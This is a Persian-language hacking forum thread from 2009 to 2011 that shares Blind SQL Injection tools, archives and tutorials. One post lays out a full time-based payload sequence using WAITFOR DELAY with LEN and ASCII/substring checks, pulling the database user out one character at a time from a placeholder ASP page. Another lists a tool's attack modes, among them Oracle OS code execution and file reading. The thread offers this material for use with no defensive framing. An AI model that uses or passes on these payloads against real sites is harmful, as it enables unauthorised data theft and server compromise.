IT Security Team  
راهنما تقویم جستجو ارسالهاي امروز نشانه گذاري انجمن ها به عنوان خوانده شده
بازگشت   IT Security Team > مقالات ، ابزارها و فیلم های آسیب پذیریهای Web Application > مباحث Sql Injection
بازنگری این صفحه فیلم ها ، داکیومنتها و ابزارهای Blind Sql Injection



پاسخ
 
LinkBack ابزارهای موضوع نحوه نمایش
قدیمی 09-01-2009, 09:18 PM   #1
مديريت انجمن
 
homay آواتار ها
 
تاریخ عضویت: Jun 2009
نوشته ها: 368
Thanks: 438
Thanked 346 Times in 169 Posts
Firedevil فیلم ها ، داکیومنتها و ابزارهای Blind Sql Injection
سلام بچه ها

در این تاپیک میخوام فیلم ها ، داکیومنتها و ابزارهایی Blind Injection رو قرار بدم

امیدوارم بدردتون بخوره
فایل های پیوست شده
نوع فایل: rar blind-sql-injection.rar‏ (752.2 کیلو بایت, 1387 نمایش)
ویرایش توسط homay : 09-03-2009 در ساعت 11:11 AM
homay آنلاین نیست.   پاسخ با نقل قول
The Following 13 Users Say Thank You to homay For This Useful Post:
4hmad (11-02-2011), arena (02-20-2011), bicha (06-28-2010), cyber-ninja (03-28-2010), d3wls3 (10-07-2011), Error_system32 (07-21-2010), kaz3m (04-19-2010), ramin_364 (01-21-2011), saeedhunter (02-11-2011), Sk0nter (09-01-2009), skyhack (05-30-2010), spool (08-07-2010), zh4d0w (04-14-2012)
قدیمی 09-03-2009, 11:04 AM   #2
مديريت انجمن
 
homay آواتار ها
 
تاریخ عضویت: Jun 2009
نوشته ها: 368
Thanks: 438
Thanked 346 Times in 169 Posts
Yahoo1 یک ابزار عالی برای Blind + آموزش تصویری
یک ابزار بسیار مفید برای Blind Sql injection به همراه آموزش تصویری ---- bsqlbf-v2.1



DataBaseهای زیر را بصورت خودکار براتون بلایند میکنه :
MS-SQL
MYSQL
POSTGRES
ORACLE

برید حالشو ببرید
فایل های پیوست شده
نوع فایل: rar bsqlbf-v2.1.rar‏ (7.03 مگابایت, 1153 نمایش)
ویرایش توسط homay : 09-03-2009 در ساعت 11:25 AM
homay آنلاین نیست.   پاسخ با نقل قول
The Following 8 Users Say Thank You to homay For This Useful Post:
cyber-ninja (03-28-2010), d3wls3 (10-07-2011), kaz3m (04-19-2010), mDoS (08-08-2011), ramin_364 (01-21-2011), saeedhunter (02-11-2011), Sk0nter (09-03-2009), skyhack (05-30-2010)
قدیمی 09-05-2009, 02:51 PM   #3
مديريت انجمن
 
homay آواتار ها
 
تاریخ عضویت: Jun 2009
نوشته ها: 368
Thanks: 438
Thanked 346 Times in 169 Posts
پیش فرض یک مثال ساده برای تشخیص Database User با استفاده از Blind
مبنای کار تاخیر زمانی در درخواستهایی که به سمت سرور فرستاده میشه هستش

کد PHP:
***91;LEFT***93;> http://***91;site***93;/page.asp?id=1 


تشخیص بر اساس تاخیر زمان 
####################################################***nbsp;
Blind SQL Injection Syntax for extracting the USER 

Total Characters 
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- 
> (+10 seconds

1st Character 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) 
WAITFOR DELAY '00:00:10'-- (+10 seconds
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) 
WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) 
WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),1,1)))=100WAITFOR DELAY '00:00:10'-- 
> (+10 seconds

2nd Character 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) 
WAITFOR DELAY '00:00:10'-- (+10 seconds
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) 
WAITFOR DELAY '00:00:10'-- (+10 seconds

3rd Character 
http://***91;site***93;/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) 
WAITFOR DELAY '00:00:10'-- (+10 seconds
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))>115WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))>105WAITFOR DELAY '00:00:10'-- 
> (+10 seconds
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))>110WAITFOR DELAY '00:00:10'-- 
> (+10 seconds
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))=109WAITFOR DELAY '00:00:10'-- 
http://***91;site***93;/page.asp?id=1; IF 
> (ASCII(lower(substring((USER),3,1)))=110WAITFOR DELAY '00:00:10'-- 
> (+10 seconds

Database User DBO 



***91;/LEFT***93; 
homay آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to homay For This Useful Post:
Averna (12-26-2010), cyber-ninja (03-28-2010), saeedhunter (02-11-2011)
قدیمی 04-17-2010, 03:43 PM   #4
مديريت انجمن
 
homay آواتار ها
 
تاریخ عضویت: Jun 2009
نوشته ها: 368
Thanks: 438
Thanked 346 Times in 169 Posts
پیش فرض bsqlbf-v2-5
integer و string

متدهای حمله :
کد:
The tool supports 8 attack modes(-type switch):-
Type 0: Blind SQL Injection based on true and false conditions returned by back-end server

Type 1: Blind SQL Injection based on true and error(e.g syntax error) returned by back-end server.

Type 2: Blind SQL Injection in "order by" and "group by".

Type 3: extracting data with SYS privileges (ORACLE dbms_export_extension exploit)

Type 4: is O.S code execution (ORACLE dbms_export_extension exploit)

Type 5: is reading files (ORACLE dbms_export_extension exploit, based on java)

Type 6: is O.S code execution DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC exploit

Type 7: is O.S code execution SYS.KUPP$PROC.CREATE_MASTER_PROCESS(), DBA Privs

Type 8: is O.S code execution DBMS_JAVA_TEST.FUNCALL, with JAVA IO Permissions
توضیحات کامل : http://code.google.com/p/bsqlbf-v2/
فایل های پیوست شده
نوع فایل: rar bsqlbf-v2-5.rar‏ (11.6 کیلو بایت, 169 نمایش)
__________________
سلام داداش

عشق یک جوشش کور است و پیوندی از سر نابینایی
دوست داشتن پیوندی خود آگاه و از روی بصیرت روشن و زلال
homay آنلاین نیست.   پاسخ با نقل قول
The Following 4 Users Say Thank You to homay For This Useful Post:
Averna (12-26-2010), bicha (06-28-2010), firemaker (04-18-2010), saeedhunter (02-11-2011)
قدیمی 04-23-2010, 02:21 PM   #5
اعضای قدیمی
 
| Red | آواتار ها
 
تاریخ عضویت: Feb 2010
نوشته ها: 107
Thanks: 67
Thanked 429 Times in 64 Posts
| Red | به Yahoo ارسال پیام
پیش فرض
فایل های پیوست شده
نوع فایل: rar BlindSqli.rar‏ (14.8 کیلو بایت, 262 نمایش)
__________________
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
آموزش شل گیری !
آموزش بایپس کردن آپلودسنتر !
آموزش کار با شل !
آموزش سرور هکینگ - استفاده از باگ سی پنل!
همه و همه در
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
[فقط اعضای سایت قادر به دیدن لینکها میباشند ]
| Red | آنلاین نیست.   پاسخ با نقل قول
The Following 3 Users Say Thank You to | Red | For This Useful Post:
Averna (12-26-2010), khoozestan (01-22-2011), sahil_kinara (10-09-2011)
قدیمی 01-22-2011, 03:30 PM   #6
عضو جديد
 
hosseinkh آواتار ها
 
تاریخ عضویت: Jan 2011
نوشته ها: 32
Thanks: 0
Thanked 4 Times in 3 Posts
پیش فرض
نقل قول:
نوشته اصلی توسط | Red | نمایش پست ها
سلام .ممنون ولی کاش یه خط توضیح درموردش میدادی
hosseinkh آنلاین نیست.   پاسخ با نقل قول
The Following User Says Thank You to hosseinkh For This Useful Post:
afshin (04-06-2011)
قدیمی 10-09-2011, 04:07 PM   #7
عضو جديد
 
sahil_kinara آواتار ها
 
تاریخ عضویت: Mar 2011
نوشته ها: 3
Thanks: 6
Thanked 0 Times in 0 Posts
پیش فرض
....thanx bro
sahil_kinara آنلاین نیست.   پاسخ با نقل قول
پاسخ

برچسب ها
blind, bsqlbf, injection, sql

« موضوع قبلی | موضوع بعدی »
ابزارهای موضوع
نحوه نمایش
حالت خطی حالت خطی

مجوز های ارسال و ویرایش
شما نمیتوانید موضوع جدیدی ارسال کنید
شما امکان ارسال پاسخ را ندارید
شما نمیتوانید فایل پیوست در پست خود ضمیمه کنید
شما نمیتوانید پست های خود را ویرایش کنید
BB code هست فعال
شکلک ها فعال است
کد [IMG] فعال است
کد HTML غیر فعال است
Trackbacks are فعال
Pingbacks are فعال
Refbacks are فعال


اکنون ساعت 06:13 AM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.

تماس با ما - ITSecTeam - بایگانی - بالا

Powered by vBulletin
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd

كليه حقوق اين وب سايت براي ITSecTeam محفوظ ميباشد


Content Relevant URLs by vBSEO ©2011, Crawlability, Inc.